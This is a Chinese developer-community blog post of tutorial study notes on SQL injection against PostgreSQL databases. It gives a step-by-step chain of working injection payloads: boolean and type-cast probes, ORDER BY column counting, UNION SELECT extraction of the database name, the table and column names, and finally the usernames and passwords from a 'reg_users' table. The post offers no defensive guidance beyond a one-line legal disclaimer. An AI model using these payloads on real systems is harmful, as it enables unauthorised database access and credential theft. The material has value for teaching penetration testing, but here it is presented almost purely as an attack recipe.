AI 助理
备案控制台
开发者社区 数据库 文章 正文

某教程学习笔记(一):11、postgreasql数据库注入

2023-02-17 108
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 某教程学习笔记(一):11、postgreasql数据库注入


一、判断是否存在注入


and 1=2 返回错误


and 1=1 返回正常,存在注入


and 1::int=1 返回正常说明是postgresql数据库


二、判断字段数量


order by 5 返回错误

0a2653c851af460fa595bd959398a8f1.png

order by 4 返回正常说明,有四列

0eacb84100b54626af849e6b562bf92a.png

三、联合查询


union select ‘1’,‘2’,‘3’,‘4’ 可以看出2/3号位置显示

2d65d23f6d4748949b924e4057485923.png

四、获取当前数据库


union select ‘1’,current_database(),‘3’,‘4’

0a2653c851af460fa595bd959398a8f1.png

五、获取第一个表


union select ‘1’,relname,‘3’,‘4’ from pg_stat_user_tables limit 1 offset 0

0eacb84100b54626af849e6b562bf92a.png

获取第二个表


union select ‘1’,relname,relname,‘4’ from pg_stat_user_tables limit 1 offset 1


六、获取第一个字段


union select ‘1’,column_name,‘3’,‘4’ from information_schema.columns where table_name=‘reg_users’ limit 1 offset 0

2d65d23f6d4748949b924e4057485923.png

获取第二个字段


union select ‘1’,column_name,‘3’,‘4’ from information_schema.columns where table_name=‘reg_users’ limit 1 offset 1


七、获取字段内容


union select ‘1’,’’||name||’,’||password||’’,‘3’,‘4’ from reg_users

2e9b90b2ca334476abebe75bafe6eeaa.png


禁止非法,后果自负


文章标签:
关系型数据库
PostgreSQL
数据库
关键词:
数据库教程
学习笔记数据库
数据库学习笔记
数据库注入
教程数据库注入
sumith
目录
相关文章
zzy的aly
|
4月前
|
存储 SQL 关系型数据库
Mysql学习笔记(二):数据库命令行代码总结
这篇文章是关于MySQL数据库命令行操作的总结,包括登录、退出、查看时间与版本、数据库和数据表的基本操作(如创建、删除、查看)、数据的增删改查等。它还涉及了如何通过SQL语句进行条件查询、模糊查询、范围查询和限制查询,以及如何进行表结构的修改。这些内容对于初学者来说非常实用,是学习MySQL数据库管理的基础。
zzy的aly
207 6
德哥
|
17天前
|
存储 关系型数据库 分布式数据库
PolarDB 开源基础教程系列 8 数据库生态
PolarDB是一款开源的云原生分布式数据库,源自阿里云商业产品。为降低使用门槛,PolarDB携手伙伴打造了完整的开源生态,涵盖操作系统、芯片、存储、集成管控、监控、审计、开发者工具、数据同步、超融合计算、ISV软件、开源插件、人才培养、社区合作及大型用户合作等领域。通过这些合作伙伴,PolarDB提供了丰富的功能和服务,支持多种硬件和软件环境,满足不同用户的需求。更多信息请访问[PolarDB开源官方网站](https://openpolardb.com/home)。
德哥
53 4
考拉不拉
|
1月前
|
关系型数据库 MySQL API
新手教程:数据库操作(使用PDO或MySQLi扩展)
本文为新手介绍如何使用PDO和MySQLi扩展连接与操作MySQL数据库。PDO更现代灵活,支持多种数据库,适合大多数应用;MySQLi提供面向过程和面向对象两种API,适合直接控制数据库操作。教程涵盖安装配置、创建连接、执行查询(查询、插入、更新、删除)及错误处理等内容。希望这篇教程能帮助你快速上手PHP中的数据库操作!
考拉不拉
162 32
众所周知
|
3月前
|
数据库连接 Go 数据库
Go语言中的错误注入与防御编程。错误注入通过模拟网络故障、数据库错误等,测试系统稳定性
本文探讨了Go语言中的错误注入与防御编程。错误注入通过模拟网络故障、数据库错误等,测试系统稳定性;防御编程则强调在编码时考虑各种错误情况,确保程序健壮性。文章详细介绍了这两种技术在Go语言中的实现方法及其重要性,旨在提升软件质量和可靠性。
众所周知
70 1
游客54bz4h3flp7ai
|
3月前
|
存储 机器学习/深度学习 监控
南大通用GBase 8s数据库onbar基础使用教程
数据备份与恢复是确保数据安全和业务连续性的关键。onbar作为GBase 8s数据库的备份工具,需配合存储管理器使用,通过配置BAR_BSALIB_PATH等参数,实现数据的备份与恢复。本文详细介绍了onbar的配置、备份、恢复及监控流程,帮助数据库管理员构建高效的数据保护方案。
游客54bz4h3flp7ai
82 0
千寻简
|
4月前
|
存储 SQL 关系型数据库
【入门级教程】MySQL:从零开始的数据库之旅
本教程面向零基础用户,采用通俗易懂的语言和丰富的示例,帮助你快速掌握MySQL的基础知识和操作技巧。内容涵盖SQL语言基础(SELECT、INSERT、UPDATE、DELETE等常用语句)、使用索引提高查询效率、存储过程等。适合学生、开发者及数据库爱好者。
千寻简
127 0
【入门级教程】MySQL:从零开始的数据库之旅
邹荣乐
|
4月前
|
SQL NoSQL MongoDB
一款基于分布式文件存储的数据库MongoDB的介绍及基本使用教程
一款基于分布式文件存储的数据库MongoDB的介绍及基本使用教程
邹荣乐
89 0
追逐时光者
|
4月前
|
存储 NoSQL API
.NET NoSQL 嵌入式数据库 LiteDB 使用教程
.NET NoSQL 嵌入式数据库 LiteDB 使用教程~
追逐时光者
159 0
游客r2tgrg3ez7yzc
|
1月前
|
关系型数据库 MySQL 数据库连接
数据库连接工具连接mysql提示:“Host ‘172.23.0.1‘ is not allowed to connect to this MySQL server“
docker-compose部署mysql8服务后,连接时提示不允许连接问题解决
游客r2tgrg3ez7yzc
195 69
蓝易云
|
21天前
|
关系型数据库 MySQL 数据库
Docker Compose V2 安装常用数据库MySQL+Mongo
以上内容涵盖了使用 Docker Compose 安装和管理 MySQL 和 MongoDB 的详细步骤,希望对您有所帮助。
蓝易云
120 42

热门文章

最新文章

  • 1
    Docker Compose V2 安装常用数据库MySQL+Mongo
  • 2
    【赵渝强老师】达梦数据库的产品系列
  • 3
    华为数据库openGauss与PostgreSQL使用对比
  • 4
    【上云基础系列04】基于标准架构的数据库升级
  • 5
    【02】Java+若依+vue.js技术栈实现钱包积分管理系统项目-商业级电玩城积分系统商业项目实战-ui设计图figmaUI设计准备-figma汉化插件-mysql数据库设计-优雅草卓伊凡商业项目实战
  • 6
    【SQL技术】不同数据库引擎 SQL 优化方案剖析
  • 7
    【01】Java+若依+vue.js技术栈实现钱包积分管理系统项目-商业级电玩城积分系统商业项目实战-需求改为思维导图-设计数据库-确定基础架构和设计-优雅草卓伊凡商业项目实战
  • 8
    如何排查和解决PHP连接数据库MYSQL失败写锁的问题
  • 9
    如何解决 MySQL 数据库服务器 CPU 飙升的情况
  • 10
    java语言后台管理ruoyi后台管理框架-登录提示“无效的会话,或者会话已过期,请重新登录。”-扩展知识数据库中密码加密的方法-问题如何解决-以及如何重置若依后台管理框架admin密码-优雅草卓伊凡
  • 1
    【YashanDB 知识库】数据库一主一备部署及一主两备部署时,主备手动切换方法及自动切换配置
    13
  • 2
    阿里云连续5年进入领导者象限!Gartner®云数据库管理系统报告发布
    22
  • 3
    【YashanDB 知识库】误配置 SYSTEM 级别的 STATISTICS_LEVEL 参数为 ALL 导致数据库性能下降
    13
  • 4
    【YashanDB 知识库】用 yasldr 配置 Bulkload 模式作单线程迁移 300G 的业务数据到分布式数据库,迁移任务频繁出错
    10
  • 5
    docker快速部署OS web中间件 数据库 编程应用
    30
  • 6
    如何解决 MySQL 数据库服务器 CPU 飙升的情况
    60
  • 7
    2600 万表流计算分析如何做到? 时序数据库 TDengine 助力数百家超市智能化转型
    18
  • 8
    时序数据库 TDengine 化工新签约:存储降本一半,查询提速十倍
    15
  • 9
    Redis原理—2.单机数据库的实现
    18
  • 10
    PolarDB开源数据库进阶课18 通过pg_bulkload适配pfs实现批量导入提速
    20

    • 相关课程

    更多
  • 数据库的前世今生
  • 数据库核心概念
  • 从传统数据库到云数据库演进
  • 数据库常见问题排查
  • 数据库及SQL/MySQL基础
  • 高校精品课-西安交通大学 -数据库理论与技术

    • 相关电子书

    更多
  • DTCC 2022大会集锦《云原生一站式数据库技术与实践》
  • 阿里云瑶池数据库精要2022版
  • 2022 DTCC-阿里云一站式数据库上云最佳实践

    • 相关实验场景

    更多
  • 使用DAS实现数据库SQL优化
  • 自建数据库迁移到云数据库
  • PolarDB for AI:在数据库中通过SQL实现AI能力
  • 云原生HTAP数据库,让你的交易和分析一库搞定
  • 快速体验PolarDB开源数据库
  • SQLServer数据库的创建
    • 下一篇
    通义万相:视觉生成大模型再进化